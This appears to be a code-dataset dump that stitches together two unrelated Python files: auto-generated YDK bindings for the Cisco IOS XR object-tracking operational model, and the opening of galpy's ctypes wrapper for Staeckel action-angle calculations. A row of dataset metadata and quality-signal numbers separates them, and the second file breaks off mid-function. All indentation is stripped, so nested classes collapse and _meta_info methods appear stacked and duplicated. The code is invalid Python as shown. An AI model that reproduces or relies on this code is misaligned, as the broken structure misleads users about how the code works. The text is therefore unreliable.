('weight', (YLeaf(YType.uint32, 'weight'), ['int'])),
])
self.object_name = None
self.track_state = None
self.weight = None
self._segment_path = lambda: "threshold-track-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route/track-info/threshold-tracks/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route.TrackInfo.ThresholdTracks.ThresholdTrackInfo, ['object_name', 'track_state', 'weight'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route.TrackInfo.ThresholdTracks.ThresholdTrackInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route.TrackInfo.ThresholdTracks']['meta_info']
class TrackingInteraces(_Entity_):
"""
Tracking Interfaces
.. attribute:: interface_tracking_info
interface tracking info
**type**\: list of :py:class:`InterfaceTrackingInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackingInteraces.InterfaceTrackingInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackingInteraces, self).__init__()
self.yang_name = "tracking-interaces"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface-tracking-info", ("interface_tracking_info", ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackingInteraces.InterfaceTrackingInfo))])
self._leafs = OrderedDict()
self.interface_tracking_info = YList(self)
self._segment_path = lambda: "tracking-interaces"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackingInteraces, [], name, value)
class InterfaceTrackingInfo(_Entity_):
"""
interface tracking info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackingInteraces.InterfaceTrackingInfo, self).__init__()
self.yang_name = "interface-tracking-info"
self.yang_parent_name = "tracking-interaces"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
])
self.interface_name = None
self._segment_path = lambda: "interface-tracking-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route/track-info/tracking-interaces/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackingInteraces.InterfaceTrackingInfo, ['interface_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackingInteraces.InterfaceTrackingInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackingInteraces']['meta_info']
class Delayed(_Entity_):
"""
Is the state change delay counter in progress
.. attribute:: time_remaining
The time remaining in seconds for the counter to trigger state change
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: track_state
State the track will transition to. Track state. True means track is up; False means track is down
**type**\: bool
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route.TrackInfo.Delayed, self).__init__()
self.yang_name = "delayed"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_remaining', (YLeaf(YType.uint32, 'time-remaining'), ['int'])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
])
self.time_remaining = None
self.track_state = None
self._segment_path = lambda: "delayed"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route.TrackInfo.Delayed, ['time_remaining', 'track_state'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route.TrackInfo.Delayed']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route.TrackInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route']['meta_info']
class TrackTypeInterfaceBrief(_Entity_):
"""
Object Tracking Type Interface brief info
.. attribute:: track_info_brief
track info brief
**type**\: list of :py:class:`TrackInfoBrief <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterfaceBrief, self).__init__()
self.yang_name = "track-type-interface-brief"
self.yang_parent_name = "object-tracking"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-info-brief", ("track_info_brief", ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief))])
self._leafs = OrderedDict()
self.track_info_brief = YList(self)
self._segment_path = lambda: "track-type-interface-brief"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterfaceBrief, [], name, value)
class TrackInfoBrief(_Entity_):
"""
track info brief
.. attribute:: track_type_info
Track type information
**type**\: :py:class:`TrackTypeInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo>`
**config**\: False
.. attribute:: tracke_name
Track Name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: type
Track type
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
.. attribute:: track_state
Track state
**type**\: bool
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief, self).__init__()
self.yang_name = "track-info-brief"
self.yang_parent_name = "track-type-interface-brief"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-type-info", ("track_type_info", ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo))])
self._leafs = OrderedDict([
('tracke_name', (YLeaf(YType.str, 'tracke-name'), ['str'])),
('type', (YLeaf(YType.enumeration, 'type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
])
self.tracke_name = None
self.type = None
self.track_state = None
self.track_type_info = ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo()
self.track_type_info.parent = self
self._children_name_map["track_type_info"] = "track-type-info"
self._segment_path = lambda: "track-info-brief"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface-brief/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief, ['tracke_name', 'type', 'track_state'], name, value)
class TrackTypeInfo(_Entity_):
"""
Track type information
.. attribute:: interface_tracks
track type interface info
**type**\: :py:class:`InterfaceTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks>`
**config**\: False
.. attribute:: route_tracks
track type route info
**type**\: :py:class:`RouteTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks>`
**config**\: False
.. attribute:: ipsla_tracks
track type rtr info
**type**\: :py:class:`IpslaTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks>`
**config**\: False
.. attribute:: bfd_tracks
track type bfdrtr info
**type**\: :py:class:`BfdTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks>`
**config**\: False
.. attribute:: discriminant
discriminant
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo, self).__init__()
self.yang_name = "track-type-info"
self.yang_parent_name = "track-info-brief"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface-tracks", ("interface_tracks", ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks)), ("route-tracks", ("route_tracks", ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks)), ("ipsla-tracks", ("ipsla_tracks", ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks)), ("bfd-tracks", ("bfd_tracks", ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks))])
self._leafs = OrderedDict([
('discriminant', (YLeaf(YType.enumeration, 'discriminant'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
])
self.discriminant = None
self.interface_tracks = ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks()
self.interface_tracks.parent = self
self._children_name_map["interface_tracks"] = "interface-tracks"
self.route_tracks = ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks()
self.route_tracks.parent = self
self._children_name_map["route_tracks"] = "route-tracks"
self.ipsla_tracks = ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks()
self.ipsla_tracks.parent = self
self._children_name_map["ipsla_tracks"] = "ipsla-tracks"
self.bfd_tracks = ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks()
self.bfd_tracks.parent = self
self._children_name_map["bfd_tracks"] = "bfd-tracks"
self._segment_path = lambda: "track-type-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface-brief/track-info-brief/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo, ['discriminant'], name, value)
class InterfaceTracks(_Entity_):
"""
track type interface info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks, self).__init__()
self.yang_name = "interface-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
])
self.interface_name = None
self._segment_path = lambda: "interface-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface-brief/track-info-brief/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks, ['interface_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks']['meta_info']
class RouteTracks(_Entity_):
"""
track type route info
.. attribute:: prefix
Prefix
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_length
Prefix Length
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: vrf
VRF Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: next_hop
Next Hop
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks, self).__init__()
self.yang_name = "route-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.uint32, 'prefix'), ['int'])),
('prefix_length', (YLeaf(YType.uint32, 'prefix-length'), ['int'])),
('vrf', (YLeaf(YType.str, 'vrf'), ['str'])),
('next_hop', (YLeaf(YType.str, 'next-hop'), ['str'])),
])
self.prefix = None
self.prefix_length = None
self.vrf = None
self.next_hop = None
self._segment_path = lambda: "route-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface-brief/track-info-brief/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks, ['prefix', 'prefix_length', 'vrf', 'next_hop'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks']['meta_info']
class IpslaTracks(_Entity_):
"""
track type rtr info
.. attribute:: ipsla_op_id
Op Id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rtt
Latest RTT
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code
Latest Return Code
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code_string
Latest Ret Code String
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks, self).__init__()
self.yang_name = "ipsla-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ipsla_op_id', (YLeaf(YType.uint32, 'ipsla-op-id'), ['int'])),
('rtt', (YLeaf(YType.uint32, 'rtt'), ['int'])),
('return_code', (YLeaf(YType.uint32, 'return-code'), ['int'])),
('return_code_string', (YLeaf(YType.str, 'return-code-string'), ['str'])),
])
self.ipsla_op_id = None
self.rtt = None
self.return_code = None
self.return_code_string = None
self._segment_path = lambda: "ipsla-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface-brief/track-info-brief/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks, ['ipsla_op_id', 'rtt', 'return_code', 'return_code_string'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks']['meta_info']
class BfdTracks(_Entity_):
"""
track type bfdrtr info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: destination_address
Destination Address
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rate
Rate
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: debounce_count
Debounce Count
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks, self).__init__()
self.yang_name = "bfd-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('destination_address', (YLeaf(YType.uint32, 'destination-address'), ['int'])),
('rate', (YLeaf(YType.uint32, 'rate'), ['int'])),
('debounce_count', (YLeaf(YType.uint32, 'debounce-count'), ['int'])),
])
self.interface_name = None
self.destination_address = None
self.rate = None
self.debounce_count = None
self._segment_path = lambda: "bfd-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface-brief/track-info-brief/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks, ['interface_name', 'destination_address', 'rate', 'debounce_count'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterfaceBrief']['meta_info']
def clone_ptr(self):
self._top_entity = ObjectTracking()
return self._top_entity
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking']['meta_info']
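# Hypothetical usage sketch, assuming a reachable NETCONF-enabled IOS XR device
# (the address and credentials below are placeholders, not part of this model):
#   from ydk.services import CRUDService
#   from ydk.providers import NetconfServiceProvider
#   provider = NetconfServiceProvider(address='192.0.2.1', username='admin', password='admin')
#   crud = CRUDService()
#   tracking = crud.read(provider, ObjectTracking())  # read the oper data tree
#   for brief in tracking.track_type_interface_brief.track_info_brief:
#       print(brief.tracke_name, brief.track_state)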
avg_line_length: 46.157886 | max_line_length: 771 | alphanum_fraction: 0.493181
qsc_* quality-signal columns (in schema order): 23129, 290887, 5.882269, 0.01055, 0.028401, 0.035501, 0.082712, 0.982999, 0.977876, 0.966652, 0.947336, 0.927564, 0.924139, 0, 0.014202, 0.414463, 290887, 6301, 772, 46.165212, 0.784571, 0.181363, 0, 0.829339, 0, 0.021423, 0.170769, 0.091996, 0, 0, 0, 0, 0, 1, 0.095497, false, 0, 0.034858, 0, 0.19862, 0, 0, 0, 0, null, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7

hexsha: 13cc58848c58d0776c91cbb7a9f6f7037c225a7a | size: 24579 | ext: py | lang: Python
max_stars_repo_path: galpy/actionAngle/actionAngleStaeckel_c.py | max_stars_repo_name: turnergarrow/galpy | max_stars_repo_head_hexsha: 7132eddbf2dab491fe137790e31eacdc604b0534 | max_stars_repo_licenses: ["BSD-3-Clause"] | max_stars_count: 1 | max_stars_repo_stars_event_min_datetime: 2019-02-28T08:54:38.000Z | max_stars_repo_stars_event_max_datetime: 2019-02-28T08:54:38.000Z
max_issues_repo_path: galpy/actionAngle/actionAngleStaeckel_c.py | max_issues_repo_name: BurcuAkbulut/galpy | max_issues_repo_head_hexsha: cabb42bef3b4f88a2f593cdb123452cd41451db3 | max_issues_repo_licenses: ["BSD-3-Clause"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: galpy/actionAngle/actionAngleStaeckel_c.py | max_forks_repo_name: BurcuAkbulut/galpy | max_forks_repo_head_hexsha: cabb42bef3b4f88a2f593cdb123452cd41451db3 | max_forks_repo_licenses: ["BSD-3-Clause"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null
content:
import os
import sys
import distutils.sysconfig as sysconfig
import warnings
import ctypes
import ctypes.util
import numpy
from numpy.ctypeslib import ndpointer
from galpy.util import galpyWarning
from galpy.util import bovy_coords
#Find and load the library
_lib= None
outerr= None
PY3= sys.version > '3'
if PY3:
_ext_suffix= sysconfig.get_config_var('EXT_SUFFIX')
else: #pragma: no cover
_ext_suffix= '.so'
for path in sys.path:
try:
_lib = ctypes.CDLL(os.path.join(path,'galpy_actionAngle_c%s' % _ext_suffix))
except OSError as e:
if os.path.exists(os.path.join(path,'galpy_actionAngle_c%s' % _ext_suffix)): #pragma: no cover
outerr= e
_lib = None
else:
break
if _lib is None: #pragma: no cover
if outerr is not None:
warnings.warn("actionAngleStaeckel_c extension module not loaded, because of error '%s' " % outerr,
galpyWarning)
else:
warnings.warn("actionAngleStaeckel_c extension module not loaded, because galpy_actionAngle_c%s image was not found" % _ext_suffix,
galpyWarning)
_ext_loaded= False
else:
_ext_loaded= True
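#Sketch (an assumption, not documented galpy API guidance): callers can gate on
#this module-level flag before using the C wrappers defined below, e.g.
#  from galpy.actionAngle import actionAngleStaeckel_c as aASc
#  if aASc._ext_loaded:
#      ...  #safe to call the *_c functions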
def actionAngleStaeckel_c(pot,delta,R,vR,vT,z,vz,u0=None,order=10):
"""
NAME:
actionAngleStaeckel_c
PURPOSE:
Use C to calculate actions using the Staeckel approximation
INPUT:
pot - Potential or list of such instances
delta - focal length of prolate spheroidal coordinates
R, vR, vT, z, vz - coordinates (arrays)
u0= (None) if set, u0 to use
order= (10) order of Gauss-Legendre integration of the relevant integrals
OUTPUT:
(jr,jz,err)
jr,jz : array, shape (len(R))
err - non-zero if error occurred
HISTORY:
2012-12-01 - Written - Bovy (IAS)
"""
if u0 is None:
u0, dummy= bovy_coords.Rz_to_uv(R,z,delta=numpy.atleast_1d(delta))
#Parse the potential
from galpy.orbit.integrateFullOrbit import _parse_pot
npot, pot_type, pot_args= _parse_pot(pot,potforactions=True)
#Parse delta
delta= numpy.atleast_1d(delta)
ndelta= len(delta)
#Set up result arrays
jr= numpy.empty(len(R))
jz= numpy.empty(len(R))
err= ctypes.c_int(0)
#Set up the C code
ndarrayFlags= ('C_CONTIGUOUS','WRITEABLE')
actionAngleStaeckel_actionsFunc= _lib.actionAngleStaeckel_actions
actionAngleStaeckel_actionsFunc.argtypes= [ctypes.c_int,
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.c_int,
ndpointer(dtype=numpy.int32,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.c_int,
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.c_int,
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.POINTER(ctypes.c_int)]
#Array requirements, first store old order
f_cont= [R.flags['F_CONTIGUOUS'],
vR.flags['F_CONTIGUOUS'],
vT.flags['F_CONTIGUOUS'],
z.flags['F_CONTIGUOUS'],
vz.flags['F_CONTIGUOUS'],
u0.flags['F_CONTIGUOUS'],
delta.flags['F_CONTIGUOUS']]
R= numpy.require(R,dtype=numpy.float64,requirements=['C','W'])
vR= numpy.require(vR,dtype=numpy.float64,requirements=['C','W'])
vT= numpy.require(vT,dtype=numpy.float64,requirements=['C','W'])
z= numpy.require(z,dtype=numpy.float64,requirements=['C','W'])
vz= numpy.require(vz,dtype=numpy.float64,requirements=['C','W'])
u0= numpy.require(u0,dtype=numpy.float64,requirements=['C','W'])
delta= numpy.require(delta,dtype=numpy.float64,requirements=['C','W'])
jr= numpy.require(jr,dtype=numpy.float64,requirements=['C','W'])
jz= numpy.require(jz,dtype=numpy.float64,requirements=['C','W'])
#Run the C code
actionAngleStaeckel_actionsFunc(len(R),
R,
vR,
vT,
z,
vz,
u0,
ctypes.c_int(npot),
pot_type,
pot_args,
ctypes.c_int(ndelta),
delta,
ctypes.c_int(order),
jr,
jz,
ctypes.byref(err))
#Reset input arrays
if f_cont[0]: R= numpy.asfortranarray(R)
if f_cont[1]: vR= numpy.asfortranarray(vR)
if f_cont[2]: vT= numpy.asfortranarray(vT)
if f_cont[3]: z= numpy.asfortranarray(z)
if f_cont[4]: vz= numpy.asfortranarray(vz)
if f_cont[5]: u0= numpy.asfortranarray(u0)
if f_cont[6]: delta= numpy.asfortranarray(delta)
return (jr,jz,err.value)
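#Hypothetical usage sketch (illustrative values, not recommendations):
#  import numpy
#  from galpy.potential import MWPotential2014
#  R= numpy.array([1.]); vR= numpy.array([0.1]); vT= numpy.array([1.1])
#  z= numpy.array([0.1]); vz= numpy.array([0.02])
#  jr, jz, err= actionAngleStaeckel_c(MWPotential2014, 0.45, R, vR, vT, z, vz)
#  #delta=0.45 is only an example focal length, not a recommended value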
def actionAngleStaeckel_calcu0(E,Lz,pot,delta):
"""
NAME:
actionAngleStaeckel_calcu0
PURPOSE:
Use C to calculate u0 in the Staeckel approximation
INPUT:
E, Lz - energy and angular momentum
pot - Potential or list of such instances
delta - focal length of prolate spheroidal coordinates
OUTPUT:
(u0,err)
u0 : array, shape (len(E))
err - non-zero if error occurred
HISTORY:
2012-12-03 - Written - Bovy (IAS)
"""
#Parse the potential
from galpy.orbit.integrateFullOrbit import _parse_pot
npot, pot_type, pot_args= _parse_pot(pot,potforactions=True)
#Set up result arrays
u0= numpy.empty(len(E))
err= ctypes.c_int(0)
#Parse delta
delta= numpy.atleast_1d(delta)
ndelta= len(delta)
#Set up the C code
ndarrayFlags= ('C_CONTIGUOUS','WRITEABLE')
actionAngleStaeckel_actionsFunc= _lib.calcu0
actionAngleStaeckel_actionsFunc.argtypes= [ctypes.c_int,
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.c_int,
ndpointer(dtype=numpy.int32,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.c_int,
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.POINTER(ctypes.c_int)]
#Array requirements, first store old order
f_cont= [E.flags['F_CONTIGUOUS'],
Lz.flags['F_CONTIGUOUS'],
delta.flags['F_CONTIGUOUS']]
E= numpy.require(E,dtype=numpy.float64,requirements=['C','W'])
Lz= numpy.require(Lz,dtype=numpy.float64,requirements=['C','W'])
delta= numpy.require(delta,dtype=numpy.float64,requirements=['C','W'])
